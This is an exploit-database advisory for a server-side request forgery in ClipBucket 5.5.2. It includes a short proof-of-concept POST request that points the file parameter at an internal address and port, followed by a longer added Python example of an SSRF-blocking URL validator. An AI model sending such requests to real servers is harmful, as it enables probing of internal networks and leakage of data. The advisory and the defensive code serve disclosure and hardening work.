## https://sploitus.com/exploit?id=PACKETSTORM:211129
# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
    # Google Dork: N/A
    # Date: 2025-09-11
    # Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
    # Vendor Homepage: https://clipbucket.com
    # Software Link: https://github.com/MacWarrior/clipbucket-v5
    # Version: 5.5.2 Build #90
    # Tested on: Ubuntu 20.04 LTS, PHP 7.4
    # CVE: CVE-2025-55911
    
    ## Vulnerability Description:
    An authenticated user with regular permissions can exploit a Server-Side
    Request Forgery (SSRF) vulnerability via the `file` parameter in
    `actions/file_downloader.php`. By supplying a crafted URL, attackers can
    force the server to make arbitrary HTTP requests to internal services or
    external systems. This can lead to internal network enumeration, data
    exfiltration, or pivoting attacks.
    
    ## PoC Request:
    
    POST /upload/actions/file_downloader.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=validsession
    
    file=http://127.0.0.1:3306/test.mp4
    
    The server attempts to connect to the internal service (`127.0.0.1:3306`),
    demonstrating SSRF.
    
    ## Impact:
    - Internal service enumeration
    - Potential metadata leakage
    - Pivoting to internal systems
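The root cause is that the download endpoint fetches whatever URL the `file` parameter names. The guard below is an added example written for this page; it is not ClipBucket code and does not reproduce `actions/file_downloader.php`. It shows the checks a server-side fetcher should run before connecting: scheme and port allowlists, no embedded credentials, and resolution of the hostname so that every resulting address is judged (loopback, RFC 1918, link-local, multicast and other non-public ranges are rejected), which also catches spellings such as `127.1` or `localhost` that a plain string filter misses. The function names, the allowed-port set and the `DEMO_DNS` table are assumptions constructed for the example; the resolver is injectable so the checks run offline.

```python
"""SSRF guard for a server-side file downloader (added example, not ClipBucket code)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # assumption: only web fetches are needed
ALLOWED_PORTS = {80, 443}             # assumption: block 3306 and other service ports


class UnsafeURL(ValueError):
    """Raised when the server must not fetch the given URL."""


def system_resolver(host):
    """Resolve a hostname to all of its A/AAAA answers via the OS resolver."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed lookup table standing in for DNS so the example runs offline.
DEMO_DNS = {
    "cdn.example": {"93.184.216.34"},   # constructed public address
    "intranet.example": {"10.1.2.3"},   # constructed RFC 1918 address
    "localhost": {"127.0.0.1"},
}


def demo_resolver(host):
    """Offline resolver over DEMO_DNS; unknown names fail like a real NXDOMAIN."""
    if host not in DEMO_DNS:
        raise socket.gaierror(f"constructed NXDOMAIN for {host!r}")
    return DEMO_DNS[host]


def is_public_address(ip):
    """True only for globally routable unicast addresses (checks every range explicitly
    because older Python versions report some multicast space as global)."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is judged as 127.0.0.1
    blocked = (addr.is_private or addr.is_loopback or addr.is_link_local
               or addr.is_multicast or addr.is_reserved or addr.is_unspecified)
    return addr.is_global and not blocked


def check_download_url(url, resolve=system_resolver):
    """Validate a user-supplied URL; return (scheme, host, port, pinned_ip) or raise UnsafeURL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise UnsafeURL("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    try:
        port = parts.port
    except ValueError as exc:
        raise UnsafeURL(f"invalid port: {exc}") from None
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    # IP literals are judged directly; names are resolved and EVERY answer must be
    # public, so a name mixing public and internal records is rejected outright.
    try:
        ips = {str(ipaddress.ip_address(host))}
    except ValueError:
        try:
            ips = set(resolve(host))
        except OSError as exc:
            raise UnsafeURL(f"cannot resolve {host!r}: {exc}") from None
        if not ips:
            raise UnsafeURL(f"no addresses for {host!r}")
    for ip in ips:
        if not is_public_address(ip):
            raise UnsafeURL(f"{host!r} resolves to non-public address {ip}")
    # The caller must connect to exactly this pinned IP (keeping the original Host
    # header) so a later DNS answer cannot swap in an internal address, and must
    # re-run this check on every redirect target instead of following it blindly.
    return scheme, host, port, sorted(ips)[0]


def is_safe(url, resolve=system_resolver):
    """Boolean wrapper used by the demo and tests."""
    try:
        check_download_url(url, resolve)
        return True
    except UnsafeURL:
        return False


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:3306/test.mp4", "https://cdn.example/video.mp4"):
        print(candidate, "->", "allowed" if is_safe(candidate, demo_resolver) else "rejected")
```

Against the PoC request above, the check rejects `http://127.0.0.1:3306/test.mp4` twice over (port 3306 is not allowlisted and 127.0.0.1 is loopback), while a public host on port 443 passes. Pinning the resolved address and re-validating on each redirect are what close the rebinding and open-redirect variants of the same bug; a denylist of literal strings such as `127.0.0.1` does not.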
    
    
    Regards,
    Mukundsinh Solanki
    +916355251151